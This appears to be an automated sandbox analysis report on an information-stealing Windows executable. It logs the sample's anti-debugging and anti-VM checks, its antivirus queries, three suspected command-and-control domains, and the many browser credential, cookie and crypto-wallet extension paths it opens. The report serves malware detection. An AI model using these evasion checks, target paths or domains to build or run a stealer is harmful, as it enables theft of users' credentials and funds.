              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80921 second address: 4F8093C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007FC040F64434h 0x0000000d pushad 0x0000000e call 00007FC040F643FBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F8093C second address: 4F80945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 mov ch, bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F8098A second address: 4F809B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC040F64405h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F809B1 second address: 4F70040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 jmp 00007FC0410B9FA2h 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007FC0410B9FA7h 0x0000001b sub esp, 04h 0x0000001e mov dword ptr [esp], 0000000Dh 0x00000025 call 00007FC0455C759Bh 0x0000002a mov edi, edi 0x0000002c pushad 0x0000002d jmp 00007FC0410B9FAEh 0x00000032 mov ch, 9Bh 0x00000034 popad 0x00000035 push ebp 0x00000036 pushad 0x00000037 movzx esi, bx 0x0000003a jmp 00007FC0410B9FB5h 0x0000003f popad 0x00000040 mov dword ptr [esp], ebp 0x00000043 pushad 0x00000044 mov edx, eax 0x00000046 mov ch, 4Ah 0x00000048 popad 0x00000049 mov ebp, esp 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70040 second address: 4F7005C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F64408h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F7005C second address: 4F70062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70062 second address: 4F70066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70066 second address: 4F7006A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F7006A second address: 4F70097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b jmp 00007FC040F64409h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov eax, 562374F3h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Special instruction interceptor: First address: A87F74 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Special instruction interceptor: First address: A87ED0 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Special instruction interceptor: First address: C2853A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Special instruction interceptor: First address: C4FF05 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Special instruction interceptor: First address: CB2BF5 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe TID: 5056 Thread sleep time: -210000s >= -30000s
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe TID: 5040 Thread sleep time: -40020s >= -30000s
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Last function: Thread delayed
              Source: BJQizQ6sqT.exe, 00000000.00000002.2539231638.0000000000C0A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe File opened: NTICE
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe File opened: SICE
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe File opened: SIWVID
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

              Source: BJQizQ6sqT.exe, 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: steppriflej.xyz
              Source: BJQizQ6sqT.exe, 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sendypaster.xyz
              Source: BJQizQ6sqT.exe, 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: cuddlyready.xyz
              Source: BJQizQ6sqT.exe, 00000000.00000002.2539633581.0000000000C4E000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.12.dr Binary or memory string: msmpeng.exe
              Source: Amcache.hve.12.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
              Source: BJQizQ6sqT.exe, BJQizQ6sqT.exe, 00000000.00000003.2368644392.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.12.dr Binary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: Process Memory Space: BJQizQ6sqT.exe PID: 4140, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
              Source: BJQizQ6sqT.exe String found in binary or memory: Wallets/Electrum
              Source: BJQizQ6sqT.exe String found in binary or memory: Wallets/ElectronCash
              Source: BJQizQ6sqT.exe String found in binary or memory: window-state.json
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264526296.00000000058DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Jaxx Libertyn
              Source: BJQizQ6sqT.exe String found in binary or memory: Wallets/Exodus
              Source: BJQizQ6sqT.exe String found in binary or memory: %appdata%\Ethereum
              Source: BJQizQ6sqT.exe, 00000000.00000003.2292828838.000000000105B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BJQizQ6sqT.exe String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
